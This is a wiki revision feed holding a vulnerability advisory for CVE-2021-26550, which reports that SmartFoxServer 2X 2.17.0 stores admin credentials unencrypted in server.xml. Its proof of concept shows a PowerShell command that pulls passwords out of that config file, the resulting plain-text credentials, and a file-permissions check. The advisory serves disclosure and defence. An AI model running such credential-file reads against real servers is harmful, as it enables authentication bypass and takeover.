<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2021-26550_SmartFoxServer_2X_2.17.0_%E6%86%91%E8%AD%89%E6%B4%A9%E9%9C%B2%E6%BC%8F%E6%B4%9E</id>
	<title>CVE-2021-26550 SmartFoxServer 2X 2.17.0 憑證洩露漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2021-26550_SmartFoxServer_2X_2.17.0_%E6%86%91%E8%AD%89%E6%B4%A9%E9%9C%B2%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2021-26550_SmartFoxServer_2X_2.17.0_%E6%86%91%E8%AD%89%E6%B4%A9%E9%9C%B2%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-19T13:38:03Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=CVE-2021-26550_SmartFoxServer_2X_2.17.0_%E6%86%91%E8%AD%89%E6%B4%A9%E9%9C%B2%E6%BC%8F%E6%B4%9E&amp;diff=3638&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;&lt;pre&gt; SmartFoxServer 2X 2.17.0 Credentials Disclosure   Vendor: gotoAndPlay() Product web page: https://www.smartfoxserver.com Affected version: Server: 2.17.0...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2021-26550_SmartFoxServer_2X_2.17.0_%E6%86%91%E8%AD%89%E6%B4%A9%E9%9C%B2%E6%BC%8F%E6%B4%9E&amp;diff=3638&amp;oldid=prev"/>
		<updated>2021-05-30T03:04:13Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;&amp;lt;pre&amp;gt; SmartFoxServer 2X 2.17.0 Credentials Disclosure   Vendor: gotoAndPlay() Product web page: https://www.smartfoxserver.com Affected version: Server: 2.17.0...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;&amp;lt;pre&amp;gt;&lt;br /&gt;
SmartFoxServer 2X 2.17.0 Credentials Disclosure&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Vendor: gotoAndPlay()&lt;br /&gt;
Product web page: https://www.smartfoxserver.com&lt;br /&gt;
Affected version: Server: 2.17.0&lt;br /&gt;
                  Remote Admin: 3.2.6&lt;br /&gt;
                  SmartFoxServer 2X, Pro, Basic&lt;br /&gt;
&lt;br /&gt;
Summary: SmartFoxServer (SFS) is a comprehensive SDK for&lt;br /&gt;
rapidly developing multiplayer games and applications&lt;br /&gt;
with Adobe Flash/Flex/Air, Unity, HTML5, iOS, Universal&lt;br /&gt;
Windows Platform, Android, Java, C++ and more. SmartFoxServer&lt;br /&gt;
comes with a rich set of features, an impressive&lt;br /&gt;
documentation set, tens of examples with their source,&lt;br /&gt;
powerful administration tools and a very active support&lt;br /&gt;
forum. Born in 2004, and evolving continuously since&lt;br /&gt;
then, today SmartFoxServer is the leading middleware to&lt;br /&gt;
create large scale multiplayer games, MMOs and virtual&lt;br /&gt;
communities. Thanks to its simplicity of use, versatility&lt;br /&gt;
and performance, it currently powers hundreds of projects&lt;br /&gt;
all over the world, from small chats and turn-based games&lt;br /&gt;
to massive virtual worlds and realtime games.&lt;br /&gt;
&lt;br /&gt;
Desc: The application stores sensitive information in an&lt;br /&gt;
unencrypted XML file called /config/server.xml. A local&lt;br /&gt;
attacker that has access to the current user session can&lt;br /&gt;
successfully disclose plain-text credentials that can be&lt;br /&gt;
used to bypass authentication to the affected server.&lt;br /&gt;
&lt;br /&gt;
Tested on: Windows (all) 64bit installer&lt;br /&gt;
           Linux/Unix 64bit installer&lt;br /&gt;
           MacOS (10.8+) 64bit installer&lt;br /&gt;
           Java 1.8.0_281&lt;br /&gt;
           Python 3.9.1&lt;br /&gt;
           Python 2.7.14&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic&lt;br /&gt;
                            @zeroscience&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Advisory ID: ZSL-2021-5627&lt;br /&gt;
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5627.php&lt;br /&gt;
&lt;br /&gt;
CVE ID: CVE-2021-26550&lt;br /&gt;
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-26550&lt;br /&gt;
NIST URL: https://nvd.nist.gov/vuln/detail/CVE-2021-26550&lt;br /&gt;
&lt;br /&gt;
CWE ID: CWE-312&lt;br /&gt;
CWE URL: https://cwe.mitre.org/data/definitions/312.html&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
29.01.2021&lt;br /&gt;
&lt;br /&gt;
--&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
PS C:\Users\t00t\SmartFoxServer_2X\SFS2X\config&amp;gt; Get-Content server.xml | Select-String -Pattern passw -Context 1,0&lt;br /&gt;
&lt;br /&gt;
          &amp;lt;login&amp;gt;sfsadmin&amp;lt;/login&amp;gt;&lt;br /&gt;
&amp;gt;         &amp;lt;password&amp;gt;Waddup&amp;lt;/password&amp;gt;&lt;br /&gt;
          &amp;lt;login&amp;gt;testingus&amp;lt;/login&amp;gt;&lt;br /&gt;
&amp;gt;         &amp;lt;password&amp;gt;123456&amp;lt;/password&amp;gt;&lt;br /&gt;
      &amp;lt;mailUser&amp;gt;username&amp;lt;/mailUser&amp;gt;&lt;br /&gt;
&amp;gt;     &amp;lt;mailPass&amp;gt;password&amp;lt;/mailPass&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
C:\Users\t00t\SmartFoxServer_2X\SFS2X\config&amp;gt;icacls server.xml&lt;br /&gt;
server.xml NT AUTHORITY\SYSTEM:(I)(F)&lt;br /&gt;
           BUILTIN\Administrators:(I)(F)&lt;br /&gt;
           LAB42\t00t:(I)(F)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>